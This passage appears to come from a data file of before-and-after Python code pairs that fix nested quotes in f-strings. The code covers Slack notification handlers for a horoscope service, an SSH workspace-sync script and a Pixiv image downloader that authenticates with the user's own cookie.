.replace("</td><td>", ", ")
.replace("<td>", "")
.replace("</td>", "")
for x in sorted_result
]
messages = [f"received new oracle at {event["creation_date"]} UTC"]
messages.extend(result)
messages.append("https://www.quantumcomputer.tokyo/horoscope.html")
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_update_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event['detail']['status']}')
_post_slack(title, "danger", "\n".join(messages))
return event
def _post_slack(title: str, color: str, detail: str) -> None:
payload = {
"attachments": [
{
"color": color,
"pretext": f"[{os.environ["STAGE"]}] {title}",
"text": detail,
}
]
}
try:
slack_webhook_url = "https://" + os.environ["SLACK_WEBHOOK_URL"]
response = requests.post(slack_webhook_url, data=json.dumps(payload))
except requests.exceptions.RequestException:
logger.exception(f"failed to call slack_webhook")
else:
logger.info(f"slack_webhook_response status_code={response.status_code}")
| import json
import logging
import os
import requests
logger = logging.getLogger()
logger.setLevel(logging.INFO)
def notify_horoscope_success_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is success:smile:"
messages = [
f"job_id: {event['job_id']}",
f"backend_name: {event['backend_name']}",
f"creation_date: {event['creation_date']} UTC",
]
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "storing horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event["detail"]["status"]}')
_post_slack(title, "danger", "\n".join(messages))
return event
def notify_horoscope_update_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is success:smile:"
filtered_result = {int(k[4:]): v for k, v in event.items() if k.startswith("rank")}
sorted_result = sorted(filtered_result.items(), key=lambda x: x[0])
result = [
str(x[0])
+ ": "
+ x[1]
.replace(" ", "")
.replace("</td><td>", ", ")
.replace("<td>", "")
.replace("</td>", "")
for x in sorted_result
]
messages = [f"received new oracle at {event['creation_date']} UTC"]
messages.extend(result)
messages.append("https://www.quantumcomputer.tokyo/horoscope.html")
_post_slack(title, "good", "\n".join(messages))
return event
def notify_horoscope_update_failed_to_slack(event: dict, context) -> dict:
logger.info(f"event={event}")
title = "updating horoscope is failure:rage:"
messages = ["Check detail!"]
if "detail" in event and "status" in event["detail"]:
messages.append(f'status: {event["detail"]["status"]}')
_post_slack(title, "danger", "\n".join(messages))
return event
def _post_slack(title: str, color: str, detail: str) -> None:
payload = {
"attachments": [
{
"color": color,
"pretext": f"[{os.environ['STAGE']}] {title}",
"text": detail,
}
]
}
try:
slack_webhook_url = "https://" + os.environ["SLACK_WEBHOOK_URL"]
response = requests.post(slack_webhook_url, data=json.dumps(payload))
except requests.exceptions.RequestException:
logger.exception(f"failed to call slack_webhook")
else:
logger.info(f"slack_webhook_response status_code={response.status_code}")
|
import os,sys
import signal
import paramiko
import configparser
from functools import partial
from multiprocessing import Process
from watchdog.observers import Observer
from lib.JournalSyncing import JournalSyncing
from lib.WorkspaceWatchDog import WorkspaceWatchDog
from lib.connections import select_server, get_servers
from time import localtime, strftime, sleep, time
def time_cli():
while True:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), end='\r', flush=True)
sleep(1)
def exit_handler(observers, default_server, clk_thr, signum = None, frame = None):
if signum: print (f'Signal Handler Called with Signal: {signum}')
print ('\nStopping the Observer...')
for observer in observers:
observers[observer].stop()
print ('Closing the SSH Connection...')
default_server['connection'].close()
clk_thr.join()
sys.exit(0)
'''
las sync --all: Implicit Folder Sync (GOTO: workspace.ini > SYNC ALL PATHS)
las sync --path WORKSPACE_PATH : Explicit Folder Sync
las <PROCESS>: Sync all paths on workspace.ini and Execute <PROCESS> on Default Server.
las --server SERVER_NAME --workspace WORKSPACE_NAME <PROCESS>: Sync selected workspace on workspace.ini and Execute <PROCESS> on Selected Server (SERVER_NAME must be on servers.ini).
'''
# TODO: Adjust it for the Generalized <las sync -s "SERVER" -w "WORKSPACE"> Command
if __name__ == '__main__':
properties = configparser.ConfigParser()
properties.read(os.path.join('.','config','props.ini'))
properties = properties['properties']
workspaces_config = configparser.ConfigParser()
workspaces_config.read(os.path.join('.','config','workspaces.ini'))
server_workspaces = workspaces_config[properties['default-server']]
default_server = get_servers(os.path.join('.','config','servers.ini'), properties['default-server'])
autosync = True
handlers = {}
observers = {}
for workspace_name in server_workspaces:
## Get the Workspace Directory of SSH Client
workspace_path = server_workspaces[workspace_name]
## Instantiate a WorkspaceWatchDog WatchDog (handler)
handlers[workspace_name] = WorkspaceWatchDog(local=True, verbose=True, workspace_name=workspace_name)
## Instantiate (and Start) a Recursive Observer Object for the given handler
observers[workspace_name] = Observer()
observers[workspace_name].schedule(handlers[workspace_name], path=workspace_path, recursive=True)
observers[workspace_name].start()
## Instantiate a JournalSyncing (handler)
jrnsync = JournalSyncing(default_server, server_workspaces, verbose=True, shallow_filecmp=True)
## Instantiate a CLI Clock for Monitoring the Program's Activity
clk_thr = Process(target=time_cli)
clk_thr.start()
# Handling System Shutdown Gracefully
## Instantiate a Signal Handler for System Shutdown
signal.signal(signal.SIGTERM, partial(exit_handler, observers, default_server, clk_thr))
signal.signal(signal.SIGINT, partial(exit_handler, observers, default_server, clk_thr))
while True:
# try:
jrnsync.journal_syncing()
sleep(jrnsync.sync_interval)
# except paramiko.SSHException:
# print (f'Can\'t connect to Server {jrnsync.ssh_client_dict['host']}')
# except IOError as e:
# print(e)
# pass
# except KeyboardInterrupt:
# exit_handler(observers, default_server) | import os,sys
import signal
import paramiko
import configparser
from functools import partial
from multiprocessing import Process
from watchdog.observers import Observer
from lib.JournalSyncing import JournalSyncing
from lib.WorkspaceWatchDog import WorkspaceWatchDog
from lib.connections import select_server, get_servers
from time import localtime, strftime, sleep, time
def time_cli():
while True:
print(strftime("%Y-%m-%d %H:%M:%S", localtime()), end='\r', flush=True)
sleep(1)
def exit_handler(observers, default_server, clk_thr, signum = None, frame = None):
if signum: print (f'Signal Handler Called with Signal: {signum}')
print ('\nStopping the Observer...')
for observer in observers:
observers[observer].stop()
print ('Closing the SSH Connection...')
default_server['connection'].close()
clk_thr.join()
sys.exit(0)
'''
las sync --all: Implicit Folder Sync (GOTO: workspace.ini > SYNC ALL PATHS)
las sync --path WORKSPACE_PATH : Explicit Folder Sync
las <PROCESS>: Sync all paths on workspace.ini and Execute <PROCESS> on Default Server.
las --server SERVER_NAME --workspace WORKSPACE_NAME <PROCESS>: Sync selected workspace on workspace.ini and Execute <PROCESS> on Selected Server (SERVER_NAME must be on servers.ini).
'''
# TODO: Adjust it for the Generalized <las sync -s "SERVER" -w "WORKSPACE"> Command
if __name__ == '__main__':
properties = configparser.ConfigParser()
properties.read(os.path.join('.','config','props.ini'))
properties = properties['properties']
workspaces_config = configparser.ConfigParser()
workspaces_config.read(os.path.join('.','config','workspaces.ini'))
server_workspaces = workspaces_config[properties['default-server']]
default_server = get_servers(os.path.join('.','config','servers.ini'), properties['default-server'])
autosync = True
handlers = {}
observers = {}
for workspace_name in server_workspaces:
## Get the Workspace Directory of SSH Client
workspace_path = server_workspaces[workspace_name]
## Instantiate a WorkspaceWatchDog WatchDog (handler)
handlers[workspace_name] = WorkspaceWatchDog(local=True, verbose=True, workspace_name=workspace_name)
## Instantiate (and Start) a Recursive Observer Object for the given handler
observers[workspace_name] = Observer()
observers[workspace_name].schedule(handlers[workspace_name], path=workspace_path, recursive=True)
observers[workspace_name].start()
## Instantiate a JournalSyncing (handler)
jrnsync = JournalSyncing(default_server, server_workspaces, verbose=True, shallow_filecmp=True)
## Instantiate a CLI Clock for Monitoring the Program's Activity
clk_thr = Process(target=time_cli)
clk_thr.start()
# Handling System Shutdown Gracefully
## Instantiate a Signal Handler for System Shutdown
signal.signal(signal.SIGTERM, partial(exit_handler, observers, default_server, clk_thr))
signal.signal(signal.SIGINT, partial(exit_handler, observers, default_server, clk_thr))
while True:
# try:
jrnsync.journal_syncing()
sleep(jrnsync.sync_interval)
# except paramiko.SSHException:
# print (f'Can\'t connect to Server {jrnsync.ssh_client_dict["host"]}')
# except IOError as e:
# print(e)
# pass
# except KeyboardInterrupt:
# exit_handler(observers, default_server) |
banner = '''
___ _ _ _
| _ \ (_) __ __ (_) __ __ (_) _ __ __ _ _ __ _ _
| _/ | | \ \ / | | \ V / | | | ' \ / _` | _ | '_ \ | || |
|_| |_| /_\_\ |_| \_/ ___ |_| |_|_|_| \__, | (_) | .__/ \_, |
|___| |___/ |_| |__/
'''
#-*- coding: utf-8 -*
import requests
import os
import re
import toml
from tqdm import tqdm
from json.decoder import JSONDecodeError
# get pixiv_cookie.toml
def config_pixiv():
cfg = toml.load(os.path.expanduser('./pixiv_cookie.toml'))
return cfg
def name_replace(str):
str = str.replace(r"\u0027",'')
str = str.replace(r'\\',"")
str = str.replace(r"/",'')
str = str.replace(r":",'')
str = str.replace(r"*",'')
str = str.replace(r"?",'')
str = str.replace(r'"','')
str = str.replace(r"<",'')
str = str.replace(r">",'')
str = str.replace(r"|",'')
return str
# mark folder
def mark_dir(name:str,search=None,ranking=None,r18mode=False):
if ranking == 'daily':
mode = 'daily'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'weekly':
mode = 'weekly'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'monthly':
mode = 'monthly'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'rookie':
mode = 'rookie'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'original':
mode = 'original'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'female':
mode = 'female'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'daily_r18':
if r18mode == True:
mode = 'daily_r18'
path = f'./img/R18/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'male':
mode = 'male'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search == None:
path = f'./img/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search != None and isinstance(search,str):
path = f'./img/{search}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
# get json data
def pixiv_get(id,cfg:dict) -> str:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
url = f'https://www.pixiv.net/ajax/illust/{id}/pages'
req = requests.get(url,headers=headers)
req = req.json()
# print(req)
body_data = req['body']
return body_data
# download img
def dl_img(id:int or list,cfg:dict,search=None,ranking=None,r18mode=False,AllInOneDir=False) -> bytes:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# 判斷 id 是否列表
if type(id) == list:
for i in tqdm(id):
# get json data
data_json = pixiv_get(i[0],cfg)
if AllInOneDir == True:
for url in data_json:
url = url['urls']['original']
re_name = url.split("/")[-1]
# req = th.submit(requests.get,url,headers=headers)
req = requests.get(url,headers=headers)
with open(f'./img/{re_name}','wb') as f:
f.write(req.content)
else:
# get folder name
folder_name = i[1]
# mark folder
if search != None:
mark_dir(folder_name,search)
elif ranking != None:
if r18mode == True:
mark_dir(folder_name,ranking=ranking,r18mode=True)
else:
mark_dir(folder_name,ranking=ranking)
elif search == None:
mark_dir(folder_name)
for iter1 in data_json:
# get original url
iter1 = iter1['urls']['original']
# get file name
n_name = iter1.split("/")
req = requests.get(iter1,headers=headers)
# save img
if search != None:
with open(f'./img/{search}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif ranking != None:
if r18mode == True:
with open(f'./img/R18/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
with open(f'./img/{ranking}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif search == None:
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
folder_name = get_user(id)
data_json = pixiv_get(id,cfg)
for i in tqdm(data_json):
i = i['urls']['original']
n_name = i.split("/")
if AllInOneDir == True:
req = requests.get(i,headers=headers)
with open(f'./img/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
mark_dir(folder_name)
req = requests.get(i,headers=headers)
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
# get id list
def pixiv_search(name:str,cfg:dict,mode=0) -> list:
# cookie == None ?
class_json = ['illust','popular']
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# save data
id_list = []
# https://www.pixiv.net/ajax/search/illustrations/甘雨(原神)?word=甘雨(原神)&order=date_d&mode=all&p=1&s_mode=s_tag_full&type=illust_and_ugoira&lang=zh_tw
url = f'https://www.pixiv.net/ajax/search/illustrations/{name}'
if mode == 0:
params = {
'word' : name,
'mode' : 'all'
}
elif mode == 1:
params = {
'word' : name,
'mode' : 'safe'
}
elif mode == 2:
params = {
'word' : name,
'mode' : 'r18'
}
req = requests.get(url,headers=headers,params=params)
# q= req
req = req.json()
# with open("pixiv/jsondata.json",'w') as f:
# f.write(q.text.encode().decode('unicode_escape').replace(r'\/',r'/'))
# print(req,url)
for json_tage in class_json:
try:
# get id
body_data = req['body']['illust']['data']
data_long = len(body_data)
for i in range(data_long):
id_num = body_data[i]['id']
userName = body_data[i]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
except KeyError:
# print(json_tage)
body_data = req['body']['popular']['permanent']
id_long = len(body_data)
# print(id_long)
for num in range(id_long):
id_num = body_data[num]['id']
userName = body_data[num]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
body_data_1 = req['body']['popular']['recent']
id_long_2 = len(body_data_1)
# print(id_long_2)
for num_2 in range(id_long_2):
id_num_2 = body_data_1[num_2]['id']
userName_2 = body_data_1[num_2]['userName']
userName_2 = name_replace(userName_2)
id_list.append([id_num_2,userName_2])
search = name
return id_list,search
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
def ranking(page:int, cfg:dict,mode_num=0,r18mode=0):
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
id_name_list = []
if mode_num == 0:
mode = 'daily'
elif mode_num == 1:
mode = 'weekly'
elif mode_num == 2:
mode = 'monthly'
elif mode_num == 3:
mode = 'rookie'
elif mode_num == 4:
mode = 'original'
elif mode_num == 5:
mode = 'female'
elif mode_num == 6:
if r18mode == 0:
mode = 'daily_r18'
elif r18mode == 1:
mode = 'weekly_r18'
elif r18mode == 2:
mode = 'male_r18'
elif r18mode == 3:
mode = 'female_r18'
elif mode_num == 7:
mode = 'male'
for page_num in range(page):
# ?p={page_num+1}&format=json
url = f'https://www.pixiv.net/ranking.php'
params = {
'p' : page_num+1,
'format' : 'json',
'mode' : mode
}
req = requests.get(url ,headers=headers,params=params)
req = req.json()
json_data = req['contents']
times = len(json_data)
for len_data in range(times):
id_num = json_data[len_data]['illust_id']
userName = json_data[len_data]['user_name']
userName = name_replace(userName)
id_name_list.append([id_num,userName])
# id_name_list.append(id_num)
if mode_num == 6:
mode = 'daily_r18'
return id_name_list,mode
# https://www.pixiv.net/ajax/search/artworks/甘雨?word=甘雨&order=popular_d&mode=all&p=1&s_mode=s_tag&type=all
#Need premium
def premium_search(name:str,order_num:int,mode_num:int,page_num:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
order = ['popular_d','popular_male_d','popular_female_d']
mode = ['s_tag','safe','r18']
for pages in range(page_num):
params = {
'word' : {name},
'order' : {order[order_num]},
'mode' : {mode[mode_num]},
'p' : {pages+1},
's_mode' : 's_tag',
'type' : 'all'
}
url = f'https://www.pixiv.net/ajax/search/artworks/{name}'
req = requests.get(url,headers=headers,params=params)
json_data = req.json()
print(json_data)
data_long = len(json_data['body']['illustManga']['data'])
target_data = json_data['body']['illustManga']['data']
for list_num in range(data_long):
# print(target_data[0])
# print(data_long)
illusts_id = target_data[list_num]["id"]
user_name = target_data[list_num]['userName']
userName = name_replace(userName)
id_list.append([illusts_id,user_name])
search = name
return id_list,search
def get_user_illusts(user_id:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg["login"]["cookie"]}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
url = f'https://www.pixiv.net/ajax/user/{user_id}/profile/all'
user_url = f'https://www.pixiv.net/ajax/user/{user_id}'
req_user = requests.get(user_url,headers=headers)
req_user = req_user.json()
user_name = req_user['body']['name']
req = requests.get(url,headers=headers)
req = req.json()
for illusts_ids in req['body']['illusts']:
id_list.append([illusts_ids,user_name])
return id_list
# id -> artid
# get name for id mode
def get_user(id:int) -> str:
url = f'https://www.pixiv.net/artworks/{id}'
req = requests.get(url)
text = req.text
# print(text)
# find name
obj = re.compile(r'"name":"(?P<name>.*?)"')
user_name = obj.finditer(text)
# get name
for it in user_name:
name = it.group('name')
# del非法字符
name = name_replace(name)
return name
def main():
os.system('cls')
print(banner)
cfg = config_pixiv()
AllInOneDir = cfg['path']['AllInOnePath']
print('0:Pixiv_id mode\n1:Search mode\n2:Ranking mode\n3:User illusts\n4:Premium search(Need premium)')
mode = int(input('Mode:'))
print(f"Mode:{mode}".center(50,'='))
if mode == 0: #id mode
dl_img(int(input('Pixiv_id:')),cfg,AllInOneDir=AllInOneDir)
elif mode > 10000:
dl_img(mode,cfg,AllInOneDir=AllInOneDir)
elif mode == 1: #search mode
search = input("Search:")
print('0:All\n1:Safe\n2:R18(login)')
mode_num = int(input('mode:'))
id_list , search_name = pixiv_search(search,cfg,mode=mode_num)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
elif mode == 2: #ranking mode?
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
page = int(input('Page:'))
print('0:daily\n1:weekly\n2:monthly\n3:rookie\n4:original\n5:for female\n6:r18(login)\n7:for male')
ranking_num = int(input('ranking_mode:'))
if ranking_num == 6:
try:
print('0:daily_r18\n1:weekly_r18\n2:male_r18\n3:female_r18')
r18mode = int(input("R18_mode:"))
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num,r18mode=r18mode)
# print(mode_ranking)
dl_img(id_name_list,cfg,ranking=mode_ranking,r18mode=True,AllInOneDir=AllInOneDir)
except JSONDecodeError:
exit('未登錄 . . .')
else:
id_name_list , mode_ranking = ranking(page,cfg,mode_num=ranking_num)
# print(id_name_list)
# with ThreadPoolExecutor(30) as th:
# for ids in id_name_list:
# th.submit(dl_img,id=ids[0],cfg=cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
dl_img(id_name_list,cfg,ranking=mode_ranking,AllInOneDir=AllInOneDir)
elif mode == 3: #get_user_illusts
user_id = int(input('user_id:'))
id_list = get_user_illusts(user_id,cfg)
dl_img(id_list,cfg,AllInOneDir=AllInOneDir)
elif mode == 4: #premium_search
search = input("Search:")
print('0:All popular\n1:Popula for male\n2:Popula for female')
order_num = int(input('order:'))
print('0:r18 & safe\n1:safe\n2:R18')
mode_4_num = int(input('mode:'))
pages = int(input('pages:'))
id_list , search_name = premium_search(search,order_num,mode_4_num,pages,cfg)
dl_img(id_list,cfg,search_name,AllInOneDir=AllInOneDir)
# cfg = config_pixiv()
# print(cfg['login']['cookie'])
# id_list , search_name = pixiv_search('甘雨',cfg)
# print(name)
# print(id_list)
# name = get_user(id_list)
# mark_dir(name)
# dl_img(id_list,cfg,search_name)
# print(pixiv_get())
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
exit('\nKeyboardInterrupt exit. . .')
| banner = '''
___ _ _ _
| _ \ (_) __ __ (_) __ __ (_) _ __ __ _ _ __ _ _
| _/ | | \ \ / | | \ V / | | | ' \ / _` | _ | '_ \ | || |
|_| |_| /_\_\ |_| \_/ ___ |_| |_|_|_| \__, | (_) | .__/ \_, |
|___| |___/ |_| |__/
'''
#-*- coding: utf-8 -*
import requests
import os
import re
import toml
from tqdm import tqdm
from json.decoder import JSONDecodeError
# get pixiv_cookie.toml
def config_pixiv():
cfg = toml.load(os.path.expanduser('./pixiv_cookie.toml'))
return cfg
def name_replace(str):
str = str.replace(r"\u0027",'')
str = str.replace(r'\\',"")
str = str.replace(r"/",'')
str = str.replace(r":",'')
str = str.replace(r"*",'')
str = str.replace(r"?",'')
str = str.replace(r'"','')
str = str.replace(r"<",'')
str = str.replace(r">",'')
str = str.replace(r"|",'')
return str
# mark folder
def mark_dir(name:str,search=None,ranking=None,r18mode=False):
if ranking == 'daily':
mode = 'daily'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'weekly':
mode = 'weekly'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'monthly':
mode = 'monthly'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'rookie':
mode = 'rookie'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'original':
mode = 'original'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'female':
mode = 'female'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'daily_r18':
if r18mode == True:
mode = 'daily_r18'
path = f'./img/R18/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif ranking == 'male':
mode = 'male'
path = f'./img/{mode}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search == None:
path = f'./img/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
elif search != None and isinstance(search,str):
path = f'./img/{search}/{name}的作品'
try:
os.makedirs(path)
except FileExistsError:
pass
# get json data
def pixiv_get(id,cfg:dict) -> str:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
url = f'https://www.pixiv.net/ajax/illust/{id}/pages'
req = requests.get(url,headers=headers)
req = req.json()
# print(req)
body_data = req['body']
return body_data
# download img
def dl_img(id:int or list,cfg:dict,search=None,ranking=None,r18mode=False,AllInOneDir=False) -> bytes:
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# 判斷 id 是否列表
if type(id) == list:
for i in tqdm(id):
# get json data
data_json = pixiv_get(i[0],cfg)
if AllInOneDir == True:
for url in data_json:
url = url['urls']['original']
re_name = url.split("/")[-1]
# req = th.submit(requests.get,url,headers=headers)
req = requests.get(url,headers=headers)
with open(f'./img/{re_name}','wb') as f:
f.write(req.content)
else:
# get folder name
folder_name = i[1]
# mark folder
if search != None:
mark_dir(folder_name,search)
elif ranking != None:
if r18mode == True:
mark_dir(folder_name,ranking=ranking,r18mode=True)
else:
mark_dir(folder_name,ranking=ranking)
elif search == None:
mark_dir(folder_name)
for iter1 in data_json:
# get original url
iter1 = iter1['urls']['original']
# get file name
n_name = iter1.split("/")
req = requests.get(iter1,headers=headers)
# save img
if search != None:
with open(f'./img/{search}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif ranking != None:
if r18mode == True:
with open(f'./img/R18/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
with open(f'./img/{ranking}/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
elif search == None:
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
folder_name = get_user(id)
data_json = pixiv_get(id,cfg)
for i in tqdm(data_json):
i = i['urls']['original']
n_name = i.split("/")
if AllInOneDir == True:
req = requests.get(i,headers=headers)
with open(f'./img/{n_name[-1]}','wb') as f:
f.write(req.content)
else:
mark_dir(folder_name)
req = requests.get(i,headers=headers)
with open(f'./img/{folder_name}的作品/{n_name[-1]}','wb') as f:
f.write(req.content)
return 'DONE'
# get id list
def pixiv_search(name:str,cfg:dict,mode=0) -> list:
# cookie == None ?
class_json = ['illust','popular']
headers = {'referer' : "https://www.pixiv.net/",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36"}
# save data
id_list = []
# https://www.pixiv.net/ajax/search/illustrations/甘雨(原神)?word=甘雨(原神)&order=date_d&mode=all&p=1&s_mode=s_tag_full&type=illust_and_ugoira&lang=zh_tw
url = f'https://www.pixiv.net/ajax/search/illustrations/{name}'
if mode == 0:
params = {
'word' : name,
'mode' : 'all'
}
elif mode == 1:
params = {
'word' : name,
'mode' : 'safe'
}
elif mode == 2:
params = {
'word' : name,
'mode' : 'r18'
}
req = requests.get(url,headers=headers,params=params)
# q= req
req = req.json()
# with open("pixiv/jsondata.json",'w') as f:
# f.write(q.text.encode().decode('unicode_escape').replace(r'\/',r'/'))
# print(req,url)
for json_tage in class_json:
try:
# get id
body_data = req['body']['illust']['data']
data_long = len(body_data)
for i in range(data_long):
id_num = body_data[i]['id']
userName = body_data[i]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
except KeyError:
# print(json_tage)
body_data = req['body']['popular']['permanent']
id_long = len(body_data)
# print(id_long)
for num in range(id_long):
id_num = body_data[num]['id']
userName = body_data[num]['userName']
userName = name_replace(userName)
id_list.append([id_num,userName])
body_data_1 = req['body']['popular']['recent']
id_long_2 = len(body_data_1)
# print(id_long_2)
for num_2 in range(id_long_2):
id_num_2 = body_data_1[num_2]['id']
userName_2 = body_data_1[num_2]['userName']
userName_2 = name_replace(userName_2)
id_list.append([id_num_2,userName_2])
search = name
return id_list,search
# ['daily','weekly','monthly','rookie','original','female','daily_r18','male']
def ranking(page:int, cfg:dict,mode_num=0,r18mode=0):
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
id_name_list = []
if mode_num == 0:
mode = 'daily'
elif mode_num == 1:
mode = 'weekly'
elif mode_num == 2:
mode = 'monthly'
elif mode_num == 3:
mode = 'rookie'
elif mode_num == 4:
mode = 'original'
elif mode_num == 5:
mode = 'female'
elif mode_num == 6:
if r18mode == 0:
mode = 'daily_r18'
elif r18mode == 1:
mode = 'weekly_r18'
elif r18mode == 2:
mode = 'male_r18'
elif r18mode == 3:
mode = 'female_r18'
elif mode_num == 7:
mode = 'male'
for page_num in range(page):
# ?p={page_num+1}&format=json
url = f'https://www.pixiv.net/ranking.php'
params = {
'p' : page_num+1,
'format' : 'json',
'mode' : mode
}
req = requests.get(url ,headers=headers,params=params)
req = req.json()
json_data = req['contents']
times = len(json_data)
for len_data in range(times):
id_num = json_data[len_data]['illust_id']
userName = json_data[len_data]['user_name']
userName = name_replace(userName)
id_name_list.append([id_num,userName])
# id_name_list.append(id_num)
if mode_num == 6:
mode = 'daily_r18'
return id_name_list,mode
# https://www.pixiv.net/ajax/search/artworks/甘雨?word=甘雨&order=popular_d&mode=all&p=1&s_mode=s_tag&type=all
#Need premium
def premium_search(name:str,order_num:int,mode_num:int,page_num:int,cfg:dict):
id_list = []
headers = {'referer' : "https://www.pixiv.net/ranking.php",'cookie' : f"{cfg['login']['cookie']}",'user-agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.54 Safari/537.36",'Content-Type': 'application/json'}
order = ['popular_d','popular_male_d','popular_female_d']
mode = ['s_tag','safe','r18']
for pages in range(page_num):
params = {
'word' : {name},
'order' : {order[order_num]},
'mode' : {mode[mode_num]},
'p' : {pages+1},
's_mode' : 's_tag',
'type' : 'all'
}
url = f'https://www.pixiv.net/ajax/search/artworks/{name}'
req = requests.get(url,headers=headers,params=params)
json_data = req.json()
print(json_data)
data_long = len(json_data['body']['illustManga']['data'])
target_data = json_data['body']['illustManga']['data']
for list_num in range(data_long):
# print(target_data[0])
# print(data_long)
